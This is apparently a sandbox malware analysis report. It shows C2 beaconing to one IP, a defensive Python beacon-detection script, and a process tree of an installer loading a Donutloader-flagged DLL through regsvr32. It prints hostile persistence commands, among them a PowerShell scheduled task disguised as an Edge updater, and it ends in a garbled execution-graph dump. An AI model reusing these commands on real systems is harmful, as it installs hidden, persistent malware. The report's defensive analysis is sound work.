Jan 4, 2025 01:22:33.731301069 CET | 53050 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:33.731333971 CET | 443 | 53050 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:33.731410027 CET | 53050 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:33.731596947 CET | 53050 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:33.731612921 CET | 443 | 53050 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:33.731657982 CET | 443 | 53050 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:38.700073004 CET | 53054 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:38.700125933 CET | 443 | 53054 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:38.700253963 CET | 53054 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:38.701524019 CET | 53054 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:38.701536894 CET | 443 | 53054 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:38.701581001 CET | 443 | 53054 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:43.701946974 CET | 53056 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:43.701983929 CET | 443 | 53056 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:43.705996990 CET | 53056 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:43.709899902 CET | 53056 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:43.709914923 CET | 443 | 53056 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:43.709968090 CET | 443 | 53056 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:48.700090885 CET | 53058 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:48.700129986 CET | 443 | 53058 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:48.700200081 CET | 53058 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:48.700448036 CET | 53058 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:48.700463057 CET | 443 | 53058 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:48.700510025 CET | 443 | 53058 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:53.670495987 CET | 53060 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:53.670546055 CET | 443 | 53060 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:53.670603037 CET | 53060 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:53.670967102 CET | 53060 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:53.670978069 CET | 443 | 53060 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:53.671020031 CET | 443 | 53060 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:58.669634104 CET | 53078 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:58.669644117 CET | 443 | 53078 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:58.669764996 CET | 53078 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:58.670090914 CET | 53078 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:58.670099974 CET | 443 | 53078 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:58.670145035 CET | 443 | 53078 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:03.668972015 CET | 53110 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:03.669014931 CET | 443 | 53110 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:03.669090986 CET | 53110 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:03.669302940 CET | 53110 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:03.669315100 CET | 443 | 53110 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:03.669359922 CET | 443 | 53110 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:08.668905020 CET | 53142 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:08.668927908 CET | 443 | 53142 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:08.668997049 CET | 53142 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:08.669255018 CET | 53142 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:08.669269085 CET | 443 | 53142 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:08.669305086 CET | 443 | 53142 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:13.637551069 CET | 53176 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:13.637581110 CET | 443 | 53176 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:13.637660027 CET | 53176 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:13.637864113 CET | 53176 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:13.637878895 CET | 443 | 53176 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:13.637917995 CET | 443 | 53176 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:18.606492996 CET | 53209 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:18.606527090 CET | 443 | 53209 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:18.606606960 CET | 53209 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:18.606848955 CET | 53209 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:18.606863976 CET | 443 | 53209 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:18.606909037 CET | 443 | 53209 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:23.575227022 CET | 53242 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:23.575257063 CET | 443 | 53242 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:23.575329065 CET | 53242 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:23.575563908 CET | 53242 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:23.575578928 CET | 443 | 53242 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:23.575644016 CET | 443 | 53242 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:28.543958902 CET | 53276 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:28.543992043 CET | 443 | 53276 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:28.544049978 CET | 53276 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:28.544307947 CET | 53276 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:28.544320107 CET | 443 | 53276 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:28.544359922 CET | 443 | 53276 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:33.528350115 CET | 53307 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:33.528377056 CET | 443 | 53307 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:33.528456926 CET | 53307 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:33.528707027 CET | 53307 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:33.528722048 CET | 443 | 53307 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:33.528759003 CET | 443 | 53307 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:38.496934891 CET | 53340 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:38.496942997 CET | 443 | 53340 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:38.497011900 CET | 53340 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:38.497219086 CET | 53340 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:38.497229099 CET | 443 | 53340 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:38.497268915 CET | 443 | 53340 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:43.496975899 CET | 53345 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:43.497035027 CET | 443 | 53345 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:43.497128963 CET | 53345 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:43.497360945 CET | 53345 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:43.497373104 CET | 443 | 53345 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:43.497427940 CET | 443 | 53345 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:48.500353098 CET | 53347 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:48.500399113 CET | 443 | 53347 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:48.500480890 CET | 53347 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:48.503521919 CET | 53347 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:48.503536940 CET | 443 | 53347 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:48.503577948 CET | 443 | 53347 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:53.497023106 CET | 53349 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:53.497059107 CET | 443 | 53349 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:53.497147083 CET | 53349 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:53.497344971 CET | 53349 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:53.497359991 CET | 443 | 53349 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:53.497411966 CET | 443 | 53349 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:58.497004986 CET | 53351 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:58.497040033 CET | 443 | 53351 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:58.497215986 CET | 53351 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:58.497412920 CET | 53351 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:58.497438908 CET | 443 | 53351 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:23:58.497483969 CET | 443 | 53351 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:24:03.778225899 CET | 53353 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:24:03.778258085 CET | 443 | 53353 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:24:03.778332949 CET | 53353 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:24:03.778506994 CET | 53353 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:24:03.778516054 CET | 443 | 53353 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:24:03.778568029 CET | 443 | 53353 | 103.97.176.69 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 4, 2025 01:22:30.347326040 CET | 5361653 (source/dest port boundary not recoverable from the flattened source) | 162.159.36.2 | 192.168.2.4
Jan 4, 2025 01:22:30.842066050 CET | 55342 | 53 | 192.168.2.4 | 1.1.1.1
Jan 4, 2025 01:22:30.851059914 CET | 53 | 55342 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 4, 2025 01:22:30.842066050 CET | 192.168.2.4 | 1.1.1.1 | 0xdae2 | Standard query (0) | 18.31.95.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 4, 2025 01:22:30.851059914 CET | 1.1.1.1 | 192.168.2.4 | 0xdae2 | Name error (3) | 18.31.95.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
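
The TCP table above shows a fresh connection from the analysis VM to 103.97.176.69:443 about every five seconds for the whole capture; that cadence, not any single packet, is what makes the two Suricata "Anonymous RAT CnC Checkin" hits credible as C2 check-ins. The Python below is an added example and not part of the Joe Sandbox report. It reads rows in the table's column order (timestamp, source port, destination port, source IP, destination IP), treats the first packet from the sandbox host for each (source port, destination) tuple as the connection start, and scores every destination by the median gap between connection starts together with the median absolute deviation of those gaps. The embedded rows are a constructed subset copied from the table (the first packet of each of the 20 C2 connections, two server replies, and the TCP traffic to 162.159.36.2 on port 53). The minimum of 8 connections and the 10 % relative-MAD threshold are the example's own assumptions, not values taken from the report.

```python
"""Beacon-cadence check over a sandbox report's TCP packet table.

Added example; not part of the Joe Sandbox report. Rows use the report's
TCP table columns: timestamp | src port | dst port | src IP | dst IP.
"""
import re
import statistics
from datetime import datetime, timedelta

SANDBOX_IP = "192.168.2.4"  # analysis VM address, taken from the report

# Constructed subset copied from the report's TCP table: the first client
# packet of each of the 20 connections to 103.97.176.69:443, two server
# replies, and the non-DNS TCP traffic to 162.159.36.2:53.
PACKETS = """
Jan 4, 2025 01:22:28.745677948 CET | 49736 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:28.745713949 CET | 443 | 49736 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:30.347816944 CET | 53046 | 53 | 192.168.2.4 | 162.159.36.2
Jan 4, 2025 01:22:30.352650881 CET | 53 | 53046 | 162.159.36.2 | 192.168.2.4
Jan 4, 2025 01:22:30.798497915 CET | 53046 | 53 | 192.168.2.4 | 162.159.36.2
Jan 4, 2025 01:22:33.731301069 CET | 53050 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:33.731333971 CET | 443 | 53050 | 103.97.176.69 | 192.168.2.4
Jan 4, 2025 01:22:38.700073004 CET | 53054 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:43.701946974 CET | 53056 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:48.700090885 CET | 53058 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:53.670495987 CET | 53060 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:22:58.669634104 CET | 53078 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:03.668972015 CET | 53110 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:08.668905020 CET | 53142 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:13.637551069 CET | 53176 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:18.606492996 CET | 53209 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:23.575227022 CET | 53242 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:28.543958902 CET | 53276 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:33.528350115 CET | 53307 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:38.496934891 CET | 53340 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:43.496975899 CET | 53345 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:48.500353098 CET | 53347 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:53.497023106 CET | 53349 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:23:58.497004986 CET | 53351 | 443 | 192.168.2.4 | 103.97.176.69
Jan 4, 2025 01:24:03.778225899 CET | 53353 | 443 | 192.168.2.4 | 103.97.176.69
"""

# The report prints nanoseconds; strptime's %f stops at six digits, so the
# fraction is parsed separately and added as a timedelta.
TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) CET$")


def parse_timestamp(text: str) -> datetime:
    m = TS_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    return base + timedelta(seconds=float("0." + m.group(2)))


def connection_starts(table: str) -> dict:
    """Map (dst IP, dst port) -> sorted list of connection start times.

    The first packet seen from the sandbox host for a (src port, dst) tuple
    is taken as the start of that connection (the SYN in the report's table).
    """
    seen, starts = set(), {}
    for line in table.strip().splitlines():
        ts, sport, dport, src, dst = [f.strip() for f in line.split("|")]
        if src != SANDBOX_IP:
            continue  # server-to-client packet
        key = (sport, dst, dport)
        if key in seen:
            continue  # later packet of an already-counted connection
        seen.add(key)
        starts.setdefault((dst, int(dport)), []).append(parse_timestamp(ts))
    return {k: sorted(v) for k, v in starts.items()}


def interval_stats(times: list) -> dict:
    """Median gap between consecutive starts and its median absolute deviation."""
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    med = statistics.median(gaps)
    mad = statistics.median([abs(g - med) for g in gaps])
    return {"connections": len(times), "median_gap": med, "mad": mad}


def find_beacons(table: str, min_connections: int = 8,
                 max_relative_mad: float = 0.10) -> dict:
    """Flag destinations contacted on a near-fixed cadence (thresholds assumed)."""
    findings = {}
    for dest, times in connection_starts(table).items():
        if len(times) < min_connections:
            continue
        st = interval_stats(times)
        st["beacon"] = st["mad"] <= max_relative_mad * st["median_gap"]
        findings[dest] = st
    return findings


if __name__ == "__main__":
    for (ip, port), st in find_beacons(PACKETS).items():
        print(f"{ip}:{port} n={st['connections']} median={st['median_gap']:.3f}s "
              f"mad={st['mad']:.3f}s beacon={st['beacon']}")
```

Median and MAD are used instead of mean and standard deviation so that the one late check-in (the 5.28 s gap before the 01:24:03 connection) does not dilute the score, and the single TCP connection to 162.159.36.2:53 drops out at the minimum-connection filter rather than producing a meaningless interval. The same rows can be produced from a pcap with tshark's field output, which is how this would run outside a sandbox report.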

                                                                Target ID:0
                                                                Start time:19:21:56
                                                                Start date:03/01/2025
                                                                Path:C:\Users\user\Desktop\eXIHsSYhOX.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\eXIHsSYhOX.exe"
                                                                Imagebase:0x6f0000
                                                                File size:2'495'440 bytes
                                                                MD5 hash:9170086E8D746E094AB4FE7444613030
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:1
                                                                Start time:19:21:56
                                                                Start date:03/01/2025
                                                                Path:C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp" /SL5="$2048C,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe"
                                                                Imagebase:0x3c0000
                                                                File size:3'284'992 bytes
                                                                MD5 hash:E97363B64F37EE24CDD55CEA14D1C564
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                • Detection: 1%, Virustotal, Browse
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:19:21:56
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                Imagebase:0x240000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:19:21:56
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:19:21:56
                                                                Start date:03/01/2025
                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:timeout /T 3
                                                                Imagebase:0x8f0000
                                                                File size:25'088 bytes
                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:19:21:59
                                                                Start date:03/01/2025
                                                                Path:C:\Users\user\Desktop\eXIHsSYhOX.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                Imagebase:0x6f0000
                                                                File size:2'495'440 bytes
                                                                MD5 hash:9170086E8D746E094AB4FE7444613030
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:19:21:59
                                                                Start date:03/01/2025
                                                                Path:C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp" /SL5="$304E8,1548946,795136,C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                Imagebase:0xb60000
                                                                File size:3'284'992 bytes
                                                                MD5 hash:E97363B64F37EE24CDD55CEA14D1C564
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                • Detection: 1%, Virustotal, Browse
Reputation: low
Has exited: true

Target ID: 7
Start time: 19:22:00
Start date: 03/01/2025
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll"
Imagebase: 0x520000
File size: 20'992 bytes
MD5 hash: 878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.2917895885.000000000429F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 8
Start time: 19:22:07
Start date: 03/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Imagebase: 0x330000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 19:22:07
Start date: 03/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 19:22:12
Start date: 03/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Imagebase: 0x330000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 19:22:12
Start date: 03/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 19:22:16
Start date: 03/01/2025
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll
Imagebase: 0x7ff697ac0000
File size: 25'088 bytes
MD5 hash: B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 14
Start time: 19:22:16
Start date: 03/01/2025
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: /S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll
Imagebase: 0x520000
File size: 20'992 bytes
MD5 hash: 878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 19:22:25
Start date: 03/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Imagebase: 0x330000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 19:22:25
Start date: 03/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true


Execution Graph

Execution Coverage: 4%
Dynamic/Decrypted Code Coverage: 15.4%
Signature Coverage: 31.2%
Total number of Nodes: 2000
Total number of Limit Nodes: 113
6c85bde8 53076 6c85c690 6 API calls 53016->53076 53017 6c85bfd8 memcpy 53021 6c85bffa 53017->53021 53022 6c85bfee 53017->53022 53018->53019 53019->52996 53019->53017 53020->52943 53027 6c85c027 53021->53027 53029 6c85c037 53021->53029 53026 6c85ac40 HeapFree 53022->53026 53023->52983 53024->52996 53024->53015 53026->53021 53080 6c85c720 95 API calls 53027->53080 53029->52996 53031 6c85c032 53029->53031 53081 6c85ac80 GetProcessHeap HeapAlloc HeapAlloc 53029->53081 53031->52996 53032 6c85ac30 3 API calls 53031->53032 53049 6c85c108 53031->53049 53035 6c85c0ed 53032->53035 53033 6c85bdf4 53033->53006 53037 6c85c690 6 API calls 53033->53037 53034 6c85c304 53036 6c85c336 53034->53036 53038 6c85ac40 HeapFree 53034->53038 53035->52996 53035->53049 53039 6c85c351 53036->53039 53041 6c85ac40 HeapFree 53036->53041 53037->53033 53038->53036 53042 6c85c368 53039->53042 53044 6c85ac40 HeapFree 53039->53044 53040 6c921760 91 API calls 53040->53049 53041->53039 53083 6c87e170 HeapFree 53042->53083 53043 6c9232a0 8 API calls 53043->53049 53044->53042 53046 6c85c371 53046->53047 53048 6c85ac40 HeapFree 53046->53048 53047->52943 53048->53047 53049->53034 53049->53040 53049->53043 53082 6c85f620 6 API calls 53049->53082 53051->52912 53052->52918 53053->52924 53054->52920 53055->52940 53056->52955 53058 6c85bbb2 PdhAddEnglishCounterW 53057->53058 53065 6c85baa9 53057->53065 53059 6c85bbe0 53058->53059 53067 6c85bb72 53058->53067 53070 6c9232a0 8 API calls 53059->53070 53060 6c85bbde 53060->52971 53060->52974 53062 6c85bbed 53071 6c85e100 7 API calls 53062->53071 53063 6c85ac40 HeapFree 53063->53060 